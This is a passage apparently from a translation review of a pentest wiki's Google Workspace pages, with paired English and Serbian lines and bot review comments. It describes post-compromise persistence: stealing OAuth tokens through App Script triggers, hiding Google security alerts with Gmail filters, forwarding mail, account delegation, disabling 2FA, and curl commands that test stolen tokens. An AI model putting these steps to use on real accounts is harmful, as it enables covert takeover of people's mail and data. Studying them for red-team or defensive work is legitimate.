> Ako vam je neko **podelio dokument sa App Scripts i okidačem koristeći Head** App Script-a (ne fiksnu implementaciju), možete modifikovati kod App Script-a (dodajući, na primer, funkcije za krađu tokena), pristupiti mu, i **App Script će biti izvršen sa dozvolama korisnika koji je podelio dokument sa vama**! (napomena: OAuth token vlasnika će imati pristupne opsege koje su date kada je okidač kreiran).
>
> A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?)
> **Obaveštenje će biti poslato kreatoru skripte koje ukazuje da je neko modifikovao skriptu** (Šta mislite o korišćenju gmail dozvola za generisanje filtera kako bi se sprečila upozorenja?)
> [!TIP]
> If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created.
> Ako **napadač modifikuje opsege App Script-a**, ažuriranja **neće biti primenjena** na dokument dok se ne kreira **novi okidač** sa izmenama. Stoga, napadač neće moći da ukrade token vlasnika kreatora sa više opsega nego što je postavio u okidaču koji je kreirao.
### Copying instead of sharing
When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:**
Kada kreirate link za deljenje dokumenta, kreira se link sličan ovom: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
Ako **promenite** završetak **"/edit"** u **"/copy"**, umesto da mu pristupite, google će vas pitati da li želite da **generišete kopiju dokumenta:**
<figure><img src="../../../images/image (335).png" alt=""><figcaption></figcaption></figure>
If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**.
Ako korisnik to kopira i pristupi mu, i **sadržaj dokumenta i App Scripts će biti kopirani**, međutim **okidači nisu**, stoga **ništa neće biti izvršeno**.
### Sharing as Web Application
Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear:
Napomena: takođe je moguće **podeliti App Script kao Web aplikaciju** (u Editoru App Script-a, implementirati kao Web aplikaciju), ali će se pojaviti upozorenje poput ovog:
<figure><img src="../../../images/image (337).png" alt=""><figcaption></figcaption></figure>
Followed by the **typical OAuth prompt asking** for the needed permissions.
Praćeno **tipičnim OAuth promptom koji traži** potrebne dozvole.
### Testing
You can test a gathered token to list emails with:
Možete testirati prikupljeni token za listanje emailova sa:
```bash
curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
-H "Authorization: Bearer <token>"
```
List calendar of the user:
Lista kalendara korisnika:
```bash
curl -H "Authorization: Bearer $OAUTH_TOKEN" \
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"
```
## App Script kao Persistencija
## App Script as Persistence
Jedna opcija za persistenciju bi bila da **napravite dokument i dodate okidač za funkciju getToken** i podelite dokument sa napadačem tako da svaki put kada napadač otvori datoteku, on **izvlači token žrtve.**
One option for persistence would be to **create a document and add a trigger for the the getToken** function and share the document with the attacker so every-time the attacker opens the file he **exfiltrates the token of the victim.**
Takođe je moguće napraviti App Script i postaviti ga da se aktivira svakih X vremena (kao svake minute, sata, dana...). Napadač koji je **kompromitovao akreditive ili sesiju žrtve mogao bi postaviti vremenski okidač za App Script i svaki dan** da izlaže veoma privilegovan OAuth token:
It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**:
Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you:
Jednostavno napravite App Script, idite na Okidače, kliknite na Dodaj Okidač, i izaberite kao izvor događaja Vremenski okidač i izaberite opcije koje vam najbolje odgovaraju:
<figure><img src="../../../images/image (336).png" alt=""><figcaption></figcaption></figure>
> [!CAUTION]
> This will create a security alert email and a push message to your mobile alerting about this.
> Ovo će kreirati email obaveštenje o bezbednosti i push poruku na vaš mobilni uređaj koja vas obaveštava o tome.
### Shared Document Unverified Prompt Bypass
### Zaobilaženje Nepoverljivog Upita za Deljeni Dokument
Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
Štaviše, ako vam je neko **podelio** dokument sa **pristupom za uređivanje**, možete generisati **App Scripts unutar dokumenta** i **VLASNIK (kreator) dokumenta će biti vlasnik App Script-a**.
> [!WARNING]
> This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it.
> To znači da će **kreator dokumenta izgledati kao kreator bilo kog App Script-a** koji bilo ko sa pristupom za uređivanje kreira unutar njega.
>
> This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document.
> To takođe znači da će **App Script biti poveren od strane Workspace okruženja** kreatora dokumenta.
> [!CAUTION]
> This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\
> To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `<img>` tags).
> To takođe znači da ako je **App Script već postojao** i ljudi su **dali pristup**, bilo ko sa **Editor** dozvolom na dokumentu može **modifikovati i zloupotrebiti taj pristup.**\
> Da biste zloupotrebili ovo, takođe vam je potrebno da ljudi aktiviraju App Script. A jedan zgodan trik je da **objavite skriptu kao web aplikaciju**. Kada **ljudi** koji su već dali **pristup** App Script-u pristupe web stranici, oni će **aktivirati App Script** (ovo takođe funkcioniše koristeći `<img>` tagove).
{{#include ../../../banners/hacktricks-training.md}}
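Review bot: In the "App Script as Persistence" section the heading and its two paragraphs appear with the Serbian text first and the English text second ("## App Script kao Persistencija" then "## App Script as Persistence"), the opposite of every other pair in this hunk, which with the usual removed-before-added ordering means those three units are being reverted from Serbian back to English while the paragraph right after them ("Jednostavno napravite App Script, idite na Okidače...") stays translated; check that the whole section ends up in one language. The `getToken`/`makePostRequest` block is also rewritten line by line with byte-identical text, so a translation commit is carrying whitespace-only churn on code, and the garbled comment "Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions" plus the author's personal endpoint `http://5.tcp.eu.ngrok.io:12027` survive unchanged; if the block is being touched anyway, the comment should be made readable and the URL swapped for a placeholder. Finally, UI labels are handled inconsistently: the trigger paragraph keeps `From spreadsheet`, `On open` and `On edit` in English, while the time-driven paragraph translates them ("idite na Okidače, kliknite na Dodaj Okidač ... Vremenski okidač"), which will not match what a reader sees in the Apps Script editor; keep the English label (ideally in backticks) next to any translation.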
@@ -3,184 +3,180 @@
{{#include ../../banners/hacktricks-training.md}}
> [!CAUTION]
> All the actions mentioned in this section that change setting will generate a **security alert to the email and even a push notification to any mobile synced** with the account.
> Sve akcije navedene u ovom odeljku koje menjaju postavke generisaće **bezbednosno obaveštenje na email i čak push obaveštenje na bilo koji mobilni uređaj sinhronizovan** sa nalogom.
## **Persistence in Gmail**
## **Persistencija u Gmail-u**
- You can create **filters to hide** security notifications from Google
- `from: (no-reply@accounts.google.com) "Security Alert"`
- This will prevent security emails to reach the email (but won't prevent push notifications to the mobile)
- Možete kreirati **filtre za sakrivanje** bezbednosnih obaveštenja od Google-a
- `from: (no-reply@accounts.google.com) "Security Alert"`
- Ovo će sprečiti da bezbednosni emailovi stignu na email (ali neće sprečiti push obaveštenja na mobilni)
<details>
<summary>Steps to create a gmail filter</summary>
<summary>Koraci za kreiranje gmail filtera</summary>
(Instructions from [**here**](https://support.google.com/mail/answer/6579))
(Uputstva [**ovde**](https://support.google.com/mail/answer/6579))
1. Open [Gmail](https://mail.google.com/).
2. In the search box at the top, click Show search options ![photos tune](https://lh3.googleusercontent.com/cD6YR_YvqXqNKxrWn2NAWkV6tjJtg8vfvqijKT1_9zVCrl2sAx9jROKhLqiHo2ZDYTE=w36) .
3. Enter your search criteria. If you want to check that your search worked correctly, see what emails show up by clicking **Search**.
4. At the bottom of the search window, click **Create filter**.
5. Choose what youd like the filter to do.
6. Click **Create filter**.
1. Otvorite [Gmail](https://mail.google.com/).
2. U pretraživaču na vrhu, kliknite na Prikaži opcije pretrage ![photos tune](https://lh3.googleusercontent.com/cD6YR_YvqXqNKxrWn2NAWkV6tjJtg8vfvqijKT1_9zVCrl2sAx9jROKhLqiHo2ZDYTE=w36).
3. Unesite svoje kriterijume pretrage. Ako želite da proverite da li je vaša pretraga ispravno funkcionisala, pogledajte koji emailovi se pojavljuju klikom na **Pretraži**.
4. Na dnu prozora pretrage, kliknite na **Kreiraj filter**.
5. Izaberite šta želite da filter radi.
6. Kliknite na **Kreiraj filter**.
Check your current filter (to delete them) in [https://mail.google.com/mail/u/0/#settings/filters](https://mail.google.com/mail/u/0/#settings/filters)
Proverite svoj trenutni filter (da ih obrišete) na [https://mail.google.com/mail/u/0/#settings/filters](https://mail.google.com/mail/u/0/#settings/filters)
</details>
<figure><img src="../../images/image (331).png" alt=""><figcaption></figcaption></figure>
- Create **forwarding address to forward sensitive information** (or everything) - You need manual access.
- Create a forwarding address in [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop)
- The receiving address will need to confirm this
- Then, set to forward all the emails while keeping a copy (remember to click on save changes):
- Kreirajte **adresu za prosleđivanje za prosleđivanje osetljivih informacija** (ili svega) - Potrebno je ručno pristup.
- Kreirajte adresu za prosleđivanje na [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop)
- Primalac će morati da potvrdi ovo
- Zatim, postavite da prosledite sve emailove dok zadržavate kopiju (zapamtite da kliknete na sačuvaj promene):
<figure><img src="../../images/image (332).png" alt=""><figcaption></figcaption></figure>
It's also possible create filters and forward only specific emails to the other email address.
Takođe je moguće kreirati filtre i proslediti samo određene emailove na drugu email adresu.
## App passwords
## App lozinke
If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) (follow the link to see the steps). Note that **App passwords are no longer recommended by Google and are revoked** when the user **changes his Google Account password.**
Ako ste uspeli da **kompromitujete sesiju google korisnika** i korisnik je imao **2FA**, možete **generisati** [**app lozinku**](https://support.google.com/accounts/answer/185833?hl=en) (pratite link da vidite korake). Imajte na umu da **App lozinke više nisu preporučene od strane Google-a i biće opozvane** kada korisnik **promeni lozinku svog Google naloga.**
**Even if you have an open session you will need to know the password of the user to create an app password.**
**Čak i ako imate otvorenu sesiju, moraćete da znate lozinku korisnika da biste kreirali app lozinku.**
> [!NOTE]
> App passwords can **only be used with accounts that have 2-Step Verification** turned on.
> App lozinke se **mogu koristiti samo sa nalozima koji imaju uključenu 2-Step Verification.**
## Change 2-FA and similar
## Promena 2-FA i slično
It's also possible to **turn off 2-FA or to enrol a new device** (or phone number) in this page [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\
**It's also possible to generate passkeys (add your own device), change the password, add mobile numbers for verification phones and recovery, change the recovery email and change the security questions).**
Takođe je moguće **isključiti 2-FA ili registrovati novi uređaj** (ili broj telefona) na ovoj stranici [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\
**Takođe je moguće generisati ključeve (dodati svoj uređaj), promeniti lozinku, dodati mobilne brojeve za verifikacione telefone i oporavak, promeniti email za oporavak i promeniti bezbednosna pitanja).**
> [!CAUTION]
> To **prevent security push notifications** to reach the phone of the user, you could **sign his smartphone out** (although that would be weird) because you cannot sign him in again from here.
> Da biste **sprečili bezbednosne push obaveštenja** da stignu na telefon korisnika, mogli biste **izlogovati njegov pametan telefon** (iako bi to bilo čudno) jer ne možete ponovo da ga prijavite odavde.
>
> It's also possible to **locate the device.**
> Takođe je moguće **locirati uređaj.**
**Even if you have an open session you will need to know the password of the user to change these settings.**
**Čak i ako imate otvorenu sesiju, moraćete da znate lozinku korisnika da biste promenili ove postavke.**
## Persistence via OAuth Apps
## Persistencija putem OAuth aplikacija
If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. The only problem is that Workspace can be configure to **disallow unreviewed external and/or internal OAuth apps.**\
It is pretty common for Workspace Organizations to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**.
Ako ste **kompromitovali nalog korisnika**, možete jednostavno **prihvatiti** da dodelite sve moguće dozvole **OAuth aplikaciji**. Jedini problem je što Workspace može biti podešen da **onemogući neproverene spoljne i/ili interne OAuth aplikacije.**\
Prilično je uobičajeno da Workspace organizacije po defaultu ne veruju spoljnim OAuth aplikacijama, ali veruju internim, tako da ako imate **dovoljno dozvola da generišete novu OAuth aplikaciju** unutar organizacije i spoljne aplikacije su onemogućene, generišite je i **koristite tu novu internu OAuth aplikaciju da održite persistenciju**.
Check the following page for more information about OAuth Apps:
Proverite sledeću stranicu za više informacija o OAuth aplikacijama:
{{#ref}}
gws-google-platforms-phishing/
{{#endref}}
## Persistence via delegation
## Persistencija putem delegacije
You can just **delegate the account** to a different account controlled by the attacker (if you are allowed to do this). In Workspace **Organizations** this option must be **enabled**. It can be disabled for everyone, enabled from some users/groups or for everyone (usually it's only enabled for some users/groups or completely disabled).
Možete jednostavno **delegirati nalog** na drugi nalog koji kontroliše napadač (ako vam je to dozvoljeno). U Workspace **organizacijama** ova opcija mora biti **omogućena**. Može biti onemogućena za sve, omogućena za neke korisnike/grupe ili za sve (obično je omogućena samo za neke korisnike/grupe ili potpuno onemogućena).
<details>
<summary>If you are a Workspace admin check this to enable the feature</summary>
<summary>Ako ste Workspace administrator, proverite ovo da omogućite funkciju</summary>
(Information [copied form the docs](https://support.google.com/a/answer/7223765))
(Informacije [kopirane iz dokumenata](https://support.google.com/a/answer/7223765))
As an administrator for your organization (for example, your work or school), you control whether users can delegate access to their Gmail account. You can let everyone have the option to delegate their account. Or, only let people in certain departments set up delegation. For example, you can:
Kao administrator vaše organizacije (na primer, vašeg posla ili škole), kontrolišete da li korisnici mogu delegirati pristup svom Gmail nalogu. Možete dozvoliti svima da imaju opciju da delegiraju svoj nalog. Ili, samo dozvoliti ljudima u određenim odeljenjima da postave delegaciju. Na primer, možete:
- Add an administrative assistant as a delegate on your Gmail account so they can read and send email on your behalf.
- Add a group, such as your sales department, in Groups as a delegate to give everyone access to one Gmail account.
- Dodati administrativnog asistenta kao delegata na vašem Gmail nalogu kako bi mogli da čitaju i šalju email u vaše ime.
- Dodati grupu, kao što je vaše prodajno odeljenje, u Grupe kao delegata da svima omogući pristup jednom Gmail nalogu.
Users can only delegate access to another user in the same organization, regardless of their domain or their organizational unit.
Korisnici mogu delegirati pristup samo drugom korisniku u istoj organizaciji, bez obzira na njihovu domenu ili organizacionu jedinicu.
#### Delegation limits & restrictions
#### Ograničenja i restrikcije delegacije
- **Allow users to grant their mailbox access to a Google group** option: To use this option, it must be enabled for the OU of the delegated account and for each group member's OU. Group members that belong to an OU without this option enabled can't access the delegated account.
- With typical use, 40 delegated users can access a Gmail account at the same time. Above-average use by one or more delegates might reduce this number.
- Automated processes that frequently access Gmail might also reduce the number of delegates who can access an account at the same time. These processes include APIs or browser extensions that access Gmail frequently.
- A single Gmail account supports up to 1,000 unique delegates. A group in Groups counts as one delegate toward the limit.
- Delegation does not increase the limits for a Gmail account. Gmail accounts with delegated users have the standard Gmail account limits and policies. For details, visit [Gmail limits and policies](https://support.google.com/a/topic/28609).
- **Dozvolite korisnicima da dodele pristup svojoj pošti Google grupi** opcija: Da biste koristili ovu opciju, mora biti omogućena za OU delegiranog naloga i za OU svakog člana grupe. Članovi grupe koji pripadaju OU bez ove opcije omogućene ne mogu pristupiti delegiranom nalogu.
- Sa tipičnom upotrebom, 40 delegiranih korisnika može pristupiti Gmail nalogu u isto vreme. Iznadprosečna upotreba od strane jednog ili više delegata može smanjiti ovaj broj.
- Automatizovani procesi koji često pristupaju Gmail-u takođe mogu smanjiti broj delegata koji mogu pristupiti nalogu u isto vreme. Ovi procesi uključuju API-je ili ekstenzije pretraživača koje često pristupaju Gmail-u.
- Jedan Gmail nalog podržava do 1,000 jedinstvenih delegata. Grupa u Grupama se računa kao jedan delegat prema limitu.
- Delegacija ne povećava limite za Gmail nalog. Gmail nalozi sa delegiranim korisnicima imaju standardne limite i politike Gmail naloga. Za detalje, posetite [Gmail limite i politike](https://support.google.com/a/topic/28609).
#### Step 1: Turn on Gmail delegation for your users
#### Korak 1: Uključite Gmail delegaciju za svoje korisnike
**Before you begin:** To apply the setting for certain users, put their accounts in an [organizational unit](https://support.google.com/a/topic/1227584).
**Pre nego što počnete:** Da biste primenili postavku za određene korisnike, stavite njihove naloge u [organizacionu jedinicu](https://support.google.com/a/topic/1227584).
1. [Sign in](https://admin.google.com/) to your [Google Admin console](https://support.google.com/a/answer/182076).
1. [Prijavite se](https://admin.google.com/) na vašu [Google Admin konzolu](https://support.google.com/a/answer/182076).
Sign in using an _administrator account_, not your current account CarlosPolop@gmail.com
Prijavite se koristeći _administratorski nalog_, a ne vaš trenutni nalog CarlosPolop@gmail.com
2. In the Admin console, go to Menu ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Apps**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**User settings**.
3. To apply the setting to everyone, leave the top organizational unit selected. Otherwise, select a child [organizational unit](https://support.google.com/a/topic/1227584).
4. Click **Mail delegation**.
5. Check the **Let users delegate access to their mailbox to other users in the domain** box.
6. (Optional) To let users specify what sender information is included in delegated messages sent from their account, check the **Allow users to customize this setting** box.
7. Select an option for the default sender information that's included in messages sent by delegates:
- **Show the account owner and the delegate who sent the email**—Messages include the email addresses of the Gmail account owner and the delegate.
- **Show the account owner only**—Messages include the email address of only the Gmail account owner. The delegate email address is not included.
8. (Optional) To let users add a group in Groups as a delegate, check the **Allow users to grant their mailbox access to a Google group** box.
9. Click **Save**. If you configured a child organizational unit, you might be able to **Inherit** or **Override** a parent organizational unit's settings.
10. (Optional) To turn on Gmail delegation for other organizational units, repeat steps 39.
2. U Admin konzoli, idite na Meni ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![i zatim](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Aplikacije**![i zatim](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![i zatim](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![i zatim](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Podešavanja korisnika**.
3. Da biste primenili postavku za sve, ostavite izabranu gornju organizacionu jedinicu. Inače, izaberite pod [organizacionu jedinicu](https://support.google.com/a/topic/1227584).
4. Kliknite na **Delegacija pošte**.
5. Proverite **Dozvolite korisnicima da delegiraju pristup svojoj pošti drugim korisnicima u domenu** okvir.
6. (Opcionalno) Da biste omogućili korisnicima da odrede koje informacije o pošiljaocu su uključene u delegirane poruke poslate sa njihovog naloga, proverite **Dozvolite korisnicima da prilagode ovu postavku** okvir.
7. Izaberite opciju za podrazumevane informacije o pošiljaocu koje su uključene u poruke koje šalju delegati:
- **Prikaži vlasnika naloga i delegata koji je poslao email**—Poruke uključuju email adrese vlasnika Gmail naloga i delegata.
- **Prikaži samo vlasnika naloga**—Poruke uključuju email adresu samo vlasnika Gmail naloga. Email adresa delegata nije uključena.
8. (Opcionalno) Da biste omogućili korisnicima da dodaju grupu u Grupama kao delegata, proverite **Dozvolite korisnicima da dodele pristup svojoj pošti Google grupi** okvir.
9. Kliknite na **Sačuvaj**. Ako ste konfigurisali pod organizacionu jedinicu, možda ćete moći da **Nasledite** ili **Zamenite** postavke roditeljske organizacione jedinice.
10. (Opcionalno) Da biste uključili Gmail delegaciju za druge organizacione jedinice, ponovite korake 39.
Changes can take up to 24 hours but typically happen more quickly. [Learn more](https://support.google.com/a/answer/7514107)
Promene mogu potrajati do 24 sata, ali obično se dešavaju brže. [Saznajte više](https://support.google.com/a/answer/7514107)
#### Step 2: Have users set up delegates for their accounts
#### Korak 2: Neka korisnici postave delegate za svoje naloge
After you turn on delegation, your users go to their Gmail settings to assign delegates. Delegates can then read, send, and receive messages on behalf of the user.
Nakon što uključite delegaciju, vaši korisnici idu na svoja Gmail podešavanja da dodele delegate. Delegati tada mogu čitati, slati i primati poruke u ime korisnika.
For details, direct users to [Delegate and collaborate on email](https://support.google.com/a/users/answer/138350).
Za detalje, uputite korisnike na [Delegirajte i sarađujte na email-u](https://support.google.com/a/users/answer/138350).
</details>
<details>
<summary>From a regular suer, check here the instructions to try to delegate your access</summary>
<summary>Od običnog korisnika, proverite ovde uputstva da pokušate da delegirate svoj pristup</summary>
(Info copied [**from the docs**](https://support.google.com/mail/answer/138350))
(Info kopirana [**iz dokumenata**](https://support.google.com/mail/answer/138350))
You can add up to 10 delegates.
Možete dodati do 10 delegata.
If you're using Gmail through your work, school, or other organization:
Ako koristite Gmail preko svog posla, škole ili druge organizacije:
- You can add up to 1000 delegates within your organization.
- With typical use, 40 delegates can access a Gmail account at the same time.
- If you use automated processes, such as APIs or browser extensions, a few delegates can access a Gmail account at the same time.
- Možete dodati do 1000 delegata unutar vaše organizacije.
- Sa tipičnom upotrebom, 40 delegata može pristupiti Gmail nalogu u isto vreme.
- Ako koristite automatizovane procese, kao što su API-ji ili ekstenzije pretraživača, nekoliko delegata može pristupiti Gmail nalogu u isto vreme.
1. On your computer, open [Gmail](https://mail.google.com/). You can't add delegates from the Gmail app.
2. In the top right, click Settings ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![and then](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **See all settings**.
3. Click the **Accounts and Import** or **Accounts** tab.
4. In the "Grant access to your account" section, click **Add another account**. If youre using Gmail through your work or school, your organization may restrict email delegation. If you dont see this setting, contact your admin.
- If you don't see Grant access to your account, then it's restricted.
5. Enter the email address of the person you want to add. If youre using Gmail through your work, school, or other organization, and your admin allows it, you can enter the email address of a group. This group must have the same domain as your organization. External members of the group are denied delegation access.\
\
**Important:** If the account you delegate is a new account or the password was reset, the Admin must turn off the requirement to change password when you first sign in.
1. Na svom računaru, otvorite [Gmail](https://mail.google.com/). Ne možete dodati delegate iz Gmail aplikacije.
2. U gornjem desnom uglu, kliknite na Podešavanja ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![i zatim](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **Pogledajte sve postavke**.
3. Kliknite na **Nalozi i uvoz** ili **Nalozi** tab.
4. U sekciji "Dodeli pristup svom nalogu", kliknite na **Dodaj drugi nalog**. Ako koristite Gmail preko svog posla ili škole, vaša organizacija može ograničiti delegaciju email-a. Ako ne vidite ovu postavku, kontaktirajte svog administratora.
- Ako ne vidite Dodeli pristup svom nalogu, onda je to ograničeno.
5. Unesite email adresu osobe koju želite da dodate. Ako koristite Gmail preko svog posla, škole ili druge organizacije, i vaš administrator to dozvoljava, možete uneti email adresu grupe. Ova grupa mora imati istu domenu kao vaša organizacija. Spoljni članovi grupe su odbijeni pristup delegaciji.\
\
**Važno:** Ako je nalog koji delegirate novi nalog ili je lozinka resetovana, administrator mora isključiti zahtev za promenu lozinke kada se prvi put prijavite.
- [Learn how an Admin can create a user](https://support.google.com/a/answer/33310).
- [Learn how an Admin can reset passwords](https://support.google.com/a/answer/33319).
- [Saznajte kako administrator može kreirati korisnika](https://support.google.com/a/answer/33310).
- [Saznajte kako administrator može resetovati lozinke](https://support.google.com/a/answer/33319).
6\. Click **Next Step** ![and then](https://lh3.googleusercontent.com/QbWcYKta5vh_4-OgUeFmK-JOB0YgLLoGh69P478nE6mKdfpWQniiBabjF7FVoCVXI0g=h36) **Send email to grant access**.
6. Kliknite na **Sledeći korak** ![i zatim](https://lh3.googleusercontent.com/QbWcYKta5vh_4-OgUeFmK-JOB0YgLLoGh69P478nE6mKdfpWQniiBabjF7FVoCVXI0g=h36) **Pošaljite email da dodelite pristup**.
The person you added will get an email asking them to confirm. The invitation expires after a week.
Osoba koju ste dodali će dobiti email u kojem se traži da potvrdi. Poziv važi nedelju dana.
If you added a group, all group members will become delegates without having to confirm.
Ako ste dodali grupu, svi članovi grupe će postati delegati bez potrebe za potvrdom.
Note: It may take up to 24 hours for the delegation to start taking effect.
Napomena: Može potrajati do 24 sata da delegacija počne da deluje.
</details>
## Persistence via Android App
## Persistencija putem Android aplikacije
If you have a **session inside victims google account** you can browse to the **Play Store** and might be able to **install malware** you have already uploaded to the store directly **to the phone** to maintain persistence and access the victims phone.
Ako imate **sesiju unutar google naloga žrtve**, možete pretraživati **Play Store** i možda ćete moći da **instalirate malver** koji ste već otpremili u prodavnicu direktno **na telefon** da biste održali persistenciju i pristupili telefonu žrtve.
## **Persistence via** App Scripts
## **Persistencija putem** App skripti
You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. For more information about how to do this check:
Možete kreirati **okidače zasnovane na vremenu** u App skriptama, tako da ako je App skripta prihvaćena od strane korisnika, biće **okidana** čak i **bez pristupa korisnika**. Za više informacija o tome kako to učiniti, proverite:
{{#ref}}
gws-google-platforms-phishing/gws-app-scripts.md
{{#endref}}
## References
## Reference
- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch i Beau Bullock - OK Google, Kako da Red Team GSuite?
{{#include ../../banners/hacktricks-training.md}}
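Review bot: the translated step `6. Kliknite na **Sledeći korak** ...` drops the backslash escape that the source line `6\. Click **Next Step** ...` carries; without `6\.` markdown treats the line as the start of a new ordered list after the intervening bullets and renders it as `1.`, so keep the escape in the translation. The Gmail UI labels in steps 2 to 4 (`Podešavanja` / `Pogledajte sve postavke`, `Nalozi i uvoz`, `Dodeli pristup svom nalogu`) are translated freely; verify them against the labels Gmail actually shows in Serbian, or keep the English strings in parentheses, so readers can match the steps to the UI. The talk title in the last reference line (`OK Google, Kako da Red Team GSuite?`) is a proper title and should stay in English, as the Matthew Bryant entry above it does.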
@@ -4,14 +4,14 @@
## Google Groups Privesc
By default in workspace a **group** can be **freely accessed** by any member of the organization.\
Workspace also allow to **grant permission to groups** (even GCP permissions), so if groups can be joined and they have extra permissions, an attacker may **abuse that path to escalate privileges**.
Po defaultu, u workspace-u, **grupa** može biti **slobodno dostupna** bilo kojem članu organizacije.\
Workspace takođe omogućava **dodeljivanje dozvola grupama** (čak i GCP dozvola), tako da ako se grupe mogu pridružiti i imaju dodatne dozvole, napadač može **iskoristiti tu putanju za eskalaciju privilegija**.
You potentially need access to the console to join groups that allow to be joined by anyone in the org. Check groups information in [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups).
Potrebno je da imate pristup konzoli da biste se pridružili grupama koje dozvoljavaju pridruživanje bilo kome u organizaciji. Proverite informacije o grupama na [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups).
### Access Groups Mail info
If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**.
Ako ste uspeli da **kompromitujete sesiju google korisnika**, sa [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) možete videti istoriju mejlova poslatih grupama na koje je korisnik član, i možda ćete pronaći **akreditive** ili druge **osetljive podatke**.
## GCP <--> GWS Pivoting
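Review bot: `Potrebno je da imate pristup konzoli` turns the hedged `You potentially need access to the console` into a firm requirement; keep the hedge (for example `Možda će vam biti potreban pristup konzoli`). In the last translated line, `grupama na koje je korisnik član` is ungrammatical; `grupama čiji je korisnik član` reads correctly.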
@@ -19,52 +19,52 @@ If you managed to **compromise a google user session**, from [**https://groups.g
../gcp-security/gcp-to-workspace-pivoting/
{{#endref}}
## Takeout - Download Everything Google Knows about an account
## Takeout - Preuzmi sve što Google zna o nalogu
If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none)
